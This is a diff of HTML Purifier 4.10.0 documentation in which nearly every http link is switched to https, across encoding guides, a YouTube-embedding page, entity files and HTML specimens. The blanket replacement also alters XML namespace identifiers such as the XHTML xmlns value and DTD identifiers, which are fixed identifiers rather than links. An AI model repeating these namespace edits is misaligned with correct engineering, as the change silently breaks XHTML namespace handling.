<p>If your <code>META</code> encoding and your real encoding match,
@@ -237,7 +237,7 @@ of your real encoding.</p>
has to guess: and sometimes the guess is wrong. Hackers can manipulate
this guess in order to slip XSS past filters and then fool the
browser into executing it as active code. A great example of this
is the <a href="http://shiflett.org/archive/177">Google UTF-7
is the <a href="https://shiflett.org/archive/177">Google UTF-7
exploit</a>.</p>
<p>You might be able to get away with not specifying a character
encoding with the <code>META</code> tag as long as your webserver
@@ -299,10 +299,10 @@ is slightly more difficult.</p>
yourself, via your programming language. Since you're using HTML
Purifier, I'll assume PHP, although it's not too difficult to do
similar things in
<a href="http://www.w3.org/International/O-HTTP-charset#scripting">other
<a href="https://www.w3.org/International/O-HTTP-charset#scripting">other
languages</a>. The appropriate code is:</p>
<pre><a href="http://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre>
<pre><a href="https://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre>
<p>...replacing UTF-8 with whatever your embedded encoding is.
This code must come before any output, so be careful about
@@ -312,16 +312,16 @@ output excluding whitespace within &lt;?php ?&gt; tags).</p>
<h4 id="fixcharset-server-phpini">PHP ini directive</h4>
<p>PHP also has a neat little ini directive that can save you a
header call: <code><a href="http://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p>
header call: <code><a href="https://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p>
<pre><a href="http://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre>
<pre><a href="https://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre>
<p>...will also do the trick. If PHP is running as an Apache module (and
not as FastCGI, consult
<a href="http://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property
<a href="https://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property
across many PHP files:</p>
<pre><a href="http://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset &quot;UTF-8&quot;</pre>
<pre><a href="https://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset &quot;UTF-8&quot;</pre>
<blockquote class="aside"><p>As with all INI directives, this can
also go in your php.ini file. Some hosting providers allow you to customize
@@ -340,11 +340,11 @@ techniques may work, or may not work.</p>
<p>On Apache, you can use an .htaccess file to change the character
encoding. I'll defer to
<a href="http://www.w3.org/International/questions/qa-htaccess-charset">W3C</a>
<a href="https://www.w3.org/International/questions/qa-htaccess-charset">W3C</a>
for the in-depth explanation, but it boils down to creating a file
named .htaccess with the contents:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre>
<p>Where UTF-8 is replaced with the character encoding you want to
use and .html is a file extension that this will be applied to. This
@@ -353,7 +353,7 @@ or in the subdirectories of directory you place this file in.</p>
<p>If you're feeling particularly courageous, you can use:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre>
<p>...which changes the character set Apache adds to any document that
doesn't have any Content-Type parameters. This directive, which the
@@ -363,7 +363,7 @@ with the <code>META</code> tag. If you would prefer Apache not to be
butting in on your character encodings, you can tell it not
to send anything at all:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre>
<p>...making your internal charset declaration (usually the <code>META</code> tags)
the sole source of character encoding
@@ -445,7 +445,7 @@ overrides the <code>META</code> tag. In reality, this happens only when the
XHTML is actually served as legit XML and not HTML, which is almost always
never due to Internet Explorer's lack of support for
<code>application/xhtml+xml</code> (even though doing so is often
argued to be <a href="http://www.hixie.ch/advocacy/xhtml">good
argued to be <a href="https://www.hixie.ch/advocacy/xhtml">good
practice</a> and is required by the XHTML 1.1 specification).</p>
<p>For XML, however, this XML Declaration is extremely important.
@@ -554,7 +554,7 @@ when it became far to cumbersome to support foreign languages. Bots
will now actually go through articles and convert character entities
to their corresponding real characters for the sake of user-friendliness
and searchability. See
<a href="http://meta.wikimedia.org/wiki/Help:Special_characters">Meta's
<a href="https://meta.wikimedia.org/wiki/Help:Special_characters">Meta's
page on special characters</a> for more details.
</p></blockquote>
@@ -575,7 +575,7 @@ which may be used by POST, and is required when you want to upload
files.</p>
<p>The following is a summarization of notes from
<a href="http://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html">
<a href="https://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html">
<code>FORM</code> submission and i18n</a>. That document contains lots
of useful information, but is written in a rambly manner, so
here I try to get right to the point. (Note: the original has
@@ -589,7 +589,7 @@ looks something like: <code>%C3%86</code>. There is no official way of
determining the character encoding of such a request, since the percent
encoding operates on a byte level, so it is usually assumed that it
is the same as the encoding the page containing the form was submitted
in. (<a href="http://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a>
in. (<a href="https://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a>
recommends that textual identifiers be translated to UTF-8; however, browser
compliance is spotty.) You'll run into very few problems
if you only use characters in the character encoding you chose.</p>
@@ -762,7 +762,7 @@ knows about the change too. There are some caveats though:</p>
encodings is notoriously spotty. Refer to your respective database's
documentation on how to do this properly.</p>
<p>For <a href="http://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the
<p>For <a href="https://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the
character encoding conversion for you. However, you have
to make sure that the text inside the column is what is says it is:
if you had put Shift-JIS in an ISO 8859-1 column, MySQL will irreversibly mangle
@@ -772,7 +772,7 @@ and then finally to UTF-8. Many a website had pages irreversibly mangled
because they didn't realize that they'd been deluding themselves about
the character encoding all along; don't become the next victim.</p>
<p>For <a href="http://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the
<p>For <a href="https://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the
encoding of a database (as of 8.2). You will have to dump the data, and then reimport
it into a new table. Make sure that your client encoding is set properly:
this is how PostgreSQL knows to perform an encoding conversion.</p>
@@ -832,15 +832,15 @@ converting reams of existing text and HTML files into UTF-8, as well as
making sure that all new files uploaded are properly encoded. Once again,
I can only point vaguely in the right direction for converting your
existing files: make sure you backup, make sure you use
<a href="http://php.net/ref.iconv">iconv</a>(), and
<a href="https://php.net/ref.iconv">iconv</a>(), and
make sure you know what the original character encoding of the files
is (or are, depending on the tidiness of your system).</p>
<p>However, I can proffer more specific advice on the subject of
text editors. Many text editors have notoriously spotty Unicode support.
To find out how your editor is doing, you can check out <a
href="http://www.alanwood.net/unicode/utilities_editors.html">this list</a>
or <a href="http://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a>
href="https://www.alanwood.net/unicode/utilities_editors.html">this list</a>
or <a href="https://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a>
I personally use Notepad++, which works like a charm when it comes to UTF-8.
Usually, you will have to <strong>explicitly</strong> tell the editor through some dialogue
(usually Save as or Format) what encoding you want it to use. An editor
@@ -859,7 +859,7 @@ BOM below.</p>
<h3 id="migrate-bom">Byte Order Mark (headers already sent!)</h3>
<p>The BOM, or <a href="http://en.wikipedia.org/wiki/Byte_Order_Mark">Byte
<p>The BOM, or <a href="https://en.wikipedia.org/wiki/Byte_Order_Mark">Byte
Order Mark</a>, is a magical, invisible character placed at
the beginning of UTF-8 files to tell people what the encoding is and
what the endianness of the text is. It is also unnecessary.</p>
@@ -917,7 +917,7 @@ anyway. So we'll deal with the other two edge cases.</p>
would like to read your website but get heaps of question marks or
other meaningless characters. Fixing this problem requires the
installation of a font or language pack which is often highly
dependent on what the language is. <a href="http://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a>
dependent on what the language is. <a href="https://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a>
of such a help file for the Bengali language; I am sure there are
others out there too. You just have to point users to the appropriate
help file.</p>
@@ -927,7 +927,7 @@ help file.</p>
<p>A prime example of when you'll see some very obscure Unicode
characters embedded in what otherwise would be very bland ASCII are
letters of the
<a href="http://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International
<a href="https://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International
Phonetic Alphabet (IPA)</a>, use to designate pronunciations in a very standard
manner (you probably see them all the time in your dictionary). Your
average font probably won't have support for all of the IPA characters
@@ -947,10 +947,10 @@ to known good Unicode fonts.</p>
<p>Fortunately, the folks over at Wikipedia have already done all the
heavy lifting for you. Get the CSS from the horses mouth here:
<a href="http://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>,
<a href="https://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>,
and search for &quot;.IPA&quot; There are also a smattering of
other classes you can use for other purposes, check out
<a href="http://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a>
<a href="https://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a>
for more details. For you lazy ones, this should work:</p>
<pre>.Unicode {
@@ -964,7 +964,7 @@ for more details. For you lazy ones, this should work:</p>
<p>The standard usage goes along the lines of <code>&lt;span class=&quot;Unicode&quot;&gt;Crazy
Unicode stuff here&lt;/span&gt;</code>. Characters in the
<a href="http://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a>
<a href="https://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a>
usually don't need to be fixed, but for anything else you probably
want to play it safe. Unless, of course, you don't care about IE6
users.</p>
@@ -994,10 +994,10 @@ and yes, it is variable width. Other traits:</p>
<p>Each of these traits affect different domains of text processing
in different ways. It is beyond the scope of this document to explain
what precisely these implications are. PHPWact provides
a very good <a href="http://www.phpwact.org/php/i18n/utf-8">reference document</a>
a very good <a href="https://www.phpwact.org/php/i18n/utf-8">reference document</a>
on what to expect from each function, although coverage is spotty in
some areas. Their more general notes on
<a href="http://www.phpwact.org/php/i18n/charsets">character sets</a>
<a href="https://www.phpwact.org/php/i18n/charsets">character sets</a>
are also worth looking at for information on UTF-8. Some rules of thumb
when dealing with Unicode text:</p>
@@ -1024,7 +1024,7 @@ usually won't matter since substr() also operates with byte indices!</p>
<p>You'll also need to make sure your UTF-8 is well-formed and will
probably need replacements for some of these functions. I recommend
using Harry Fuecks' <a href="http://phputf8.sourceforge.net/">PHP
using Harry Fuecks' <a href="https://phputf8.sourceforge.net/">PHP
UTF-8</a> library, rather than use mb_string directly. HTML Purifier
also defines a few useful UTF-8 compatible functions: check out
<code>Encoder.php</code> in the <code>/library/HTMLPurifier/</code>
@@ -1042,12 +1042,12 @@ UTF-8 and internationalization, and I would like to defer to them for
a more in-depth look into character sets and encodings.</p>
<ul>
<li><a href="http://www.joelonsoftware.com/articles/Unicode.html">
<li><a href="https://www.joelonsoftware.com/articles/Unicode.html">
The Absolute Minimum Every Software Developer Absolutely,
Positively Must Know About Unicode and Character Sets
(No Excuses!)</a> by Joel Spolsky, provides a <em>very</em>
good high-level look at Unicode and character sets in general.</li>
<li><a href="http://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>,
<li><a href="https://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>,
provides a lot of useful details into the innards of UTF-8, although
it may be a little off-putting to people who don't know much
about Unicode to begin with.</li>

18
htmlpurifier-4.10.0/docs/enduser-youtube.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains how to safely allow the embedding of flash from trusted sites in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Clients like their YouTube videos. It gives them a warm fuzzy feeling when
they see a neat little embedded video player on their websites that can play
@@ -26,7 +26,7 @@ content in their pages is something that a lot of people like.</p>
<p>This is a <em>bad</em> idea. The moment you embed anything untrusted,
you will definitely be slammed by a manner of nasties that can be
embedded in things from your run of the mill Flash movie to
<a href="http://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>.
<a href="https://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>.
Even <code>img</code> tags, which HTML Purifier allows by default, can be
dangerous. Be distrustful of anything that tells a browser to load content
from another website automatically.</p>
@@ -48,9 +48,9 @@ into your documents. YouTube's code goes like this:</p>
<pre>
&lt;object width=&quot;425&quot; height=&quot;350&quot;&gt;
&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/AyPzM5WK8ys&quot; /&gt;
&lt;param name=&quot;movie&quot; value=&quot;https://www.youtube.com/v/AyPzM5WK8ys&quot; /&gt;
&lt;param name=&quot;wmode&quot; value=&quot;transparent&quot; /&gt;
&lt;embed src=&quot;http://www.youtube.com/v/AyPzM5WK8ys&quot;
&lt;embed src=&quot;https://www.youtube.com/v/AyPzM5WK8ys&quot;
type=&quot;application/x-shockwave-flash&quot;
wmode=&quot;transparent&quot; width=&quot;425&quot; height=&quot;350&quot; /&gt;
&lt;/object&gt;
@@ -70,7 +70,7 @@ into your documents. YouTube's code goes like this:</p>
class=&quot;youtube-embed&quot;&gt;AyPzM5WK8ys&lt;/span&gt;</code> your
application can reconstruct the full object from this small snippet that
passes through HTML Purifier <em>unharmed</em>.
<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p>
<a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p>
<p>And the corresponding usage:</p>
@@ -124,9 +124,9 @@ number.</p>
tech-savvy enough people not to allow their users to inject malicious
code into the Flash files. An exploit on YouTube means an exploit on your
site. Even though YouTube is run by the reputable Google, it
<a href="http://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a>
<a href="https://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a>
mean they are
<a href="http://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a>
<a href="https://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a>
You're putting a certain measure of the job on an external provider (just as
you have by entrusting your user input to HTML Purifier), and
it is important that you are cognizant of the risk.</p>

2
htmlpurifier-4.10.0/docs/entities/xhtml-lat1.ent
View File

@@ -6,7 +6,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLlat1 PUBLIC
"-//W3C//ENTITIES Latin 1 for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent">
%HTMLlat1;
-->

2
htmlpurifier-4.10.0/docs/entities/xhtml-special.ent
View File

@@ -3,7 +3,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLspecial PUBLIC
"-//W3C//ENTITIES Special for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent">
%HTMLspecial;
-->

2
htmlpurifier-4.10.0/docs/entities/xhtml-symbol.ent
View File

@@ -3,7 +3,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLsymbol PUBLIC
"-//W3C//ENTITIES Symbols for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent">
%HTMLsymbol;
-->

6
htmlpurifier-4.10.0/docs/index.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Index to all HTML Purifier documentation." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -13,7 +13,7 @@
<h1>Documentation</h1>
<p><strong><a href="http://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people.
<p><strong><a href="https://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people.
Here is an index of all of them.</p>
<h2>End-user</h2>

6
htmlpurifier-4.10.0/docs/proposal-colors.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Proposal to allow for color constraints in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under Proposals</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Your website probably has a color-scheme.
<span style="color:#090; background:#FFF;">Green on white</span>,

34
htmlpurifier-4.10.0/docs/ref-devnetwork.html
View File

@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Credits and links to DevNetwork forum topics on HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,27 +15,27 @@
<div id="filing">Filed under Reference</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Many thanks to the DevNetwork community for answering questions,
theorizing about design, and offering encouragement during
the development of this library in these forum threads:</p>
<ul>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li>
</ul>
<p>...as well as any I may have forgotten.</p>

2
htmlpurifier-4.10.0/docs/ref-html-modularization.txt
View File

@@ -5,7 +5,7 @@ WARNING: This document was drafted before the implementation of this
system, and some implementation details may have evolved over time.
HTML Purifier uses the modularization of XHTML
<http://www.w3.org/TR/xhtml-modularization/> to organize the internals
<https://www.w3.org/TR/xhtml-modularization/> to organize the internals
of HTMLDefinition into a more manageable and extensible fashion. Rather
than have one super-object, HTMLDefinition is split into HTMLModules,
each of which are responsible for defining elements, their attributes,

4
htmlpurifier-4.10.0/docs/ref-whatwg.txt
View File

@@ -4,7 +4,7 @@ Web Hypertext Application Technology Working Group
== HTML 5 ==
URL: http://www.whatwg.org/specs/web-apps/current-work/
URL: https://www.whatwg.org/specs/web-apps/current-work/
HTML 5 defines a kaboodle of new elements and attributes, as well as
some well-defined, "quirks mode" HTML parsing. Although WHATWG professes
@@ -19,7 +19,7 @@ committing ourselves till the spec stabilizes, though.
More immediately speaking though, however, is the well-defined parsing
behavior that HTML 5 adds. While I have little interest in writing
another DirectLex parser, other parsers like ph5p
<http://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more
<https://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more
flexible HTML parsing (a cool feature I've seen is how they resolve
<b>bold<i>both</b>italic</i>).

2
htmlpurifier-4.10.0/docs/specimens/LICENSE
View File

@@ -3,7 +3,7 @@ Licensing of Specimens
Some files in this directory have different licenses:
windows-live-mail-desktop-beta.html - donated by laacz, public domain
img.png - LGPL, from <http://commons.wikimedia.org/wiki/Image:Pastille_chrome.png>
img.png - LGPL, from <https://commons.wikimedia.org/wiki/Image:Pastille_chrome.png>
All other files are by me, and are licensed under LGPL.

2
htmlpurifier-4.10.0/docs/specimens/html-align-to-css.html
View File

@@ -1,5 +1,5 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
"https://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>HTML align attribute to CSS - HTML Purifier Specimen</title>

10
htmlpurifier-4.10.0/docs/specimens/jochem-blok-word.html
View File

@@ -1,4 +1,4 @@
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="https://schemas.microsoft.com/office/2004/12/omml" xmlns="https://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
@@ -102,8 +102,8 @@ style='color:windowtext'>mail@example.com</span></a><o:p></o:p></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Fax&nbsp; : +xx xx xxx xx xx<o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Internet : </span><span
style='color:black'><a href="http://www.example.com/"><span lang=EN-US
style='color:black'>http://www.example.com</span></a></span><span
style='color:black'><a href="https://www.example.com/"><span lang=EN-US
style='color:black'>https://www.example.com</span></a></span><span
lang=EN-US style='color:black'><o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Kamer van koophandel
@@ -114,10 +114,10 @@ xxxxxxxxx<o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='font-size:7.5pt;color:black'>Op deze
e-mail is een disclaimer van toepassing, ga naar </span><span lang=EN-US
style='font-size:7.5pt'><a
href="http://www.example.com/disclaimer"><span
href="https://www.example.com/disclaimer"><span
style='color:black'>www.example.com/disclaimer</span></a><br>
<span style='color:black'>A disclaimer is applicable to this email, please
refer to </span><a href="http://www.example.com/disclaimer"><span
refer to </span><a href="https://www.example.com/disclaimer"><span
style='color:black'>www.example.com/disclaimer</span></a><o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US><o:p>&nbsp;</o:p></span></p>

14
htmlpurifier-4.10.0/docs/specimens/windows-live-mail-desktop-beta.html
View File

@@ -12,7 +12,7 @@ name="Compose message area" acc_role="text" CanvasTabStop="false">
style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; WIDTH: 100%; MARGIN-RIGHT: 10px; PADDING-TOP: 5px; BORDER-BOTTOM: #dddddd 1px solid; FONT-FAMILY: Verdana; HEIGHT: 25px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN
title="View a slideshow of the pictures in this e-mail message."
style="PADDING-RIGHT: 20px"><A style="COLOR: #0088e4"
href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216">Play
href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216">Play
slideshow </A></SPAN><SPAN style="COLOR: #909090"><SPAN>|</SPAN><SPAN
style="PADDING-LEFT: 20px"> Download the highest quality version of a picture by
clicking the + above it </SPAN></SPAN></NOBR></DIV>
@@ -29,9 +29,9 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%;
<UL>
<LI>Buletets
<LI>
<DIV align=justify><A title=http://laacz.lv/blog/
href="http://laacz.lv/blog/">http://laacz.lv/blog/</A> un <A
title=http://google.com/ href="http://google.com/">gugle</A></DIV>
<DIV align=justify><A title=https://laacz.lv/blog/
href="https://laacz.lv/blog/">https://laacz.lv/blog/</A> un <A
title=https://google.com/ href="https://google.com/">gugle</A></DIV>
<LI>Sarakstucitis</LI></UL></DIV><SPAN><SPAN xmlns:canvas="canvas-namespace-id"
layoutEmptyTextWellFont="Tahoma"><SPAN
style="MARGIN-BOTTOM: 15px; OVERFLOW: visible; HEIGHT: 16px"></SPAN><SPAN
@@ -46,11 +46,11 @@ style="MARGIN-BOTTOM: 25px; VERTICAL-ALIGN: top; OVERFLOW: visible; MARGIN-RIGHT
id=HiresARef
title="Click here to view or download a high resolution version of this picture"
style="COLOR: #0088e4; TEXT-DECORATION: none"
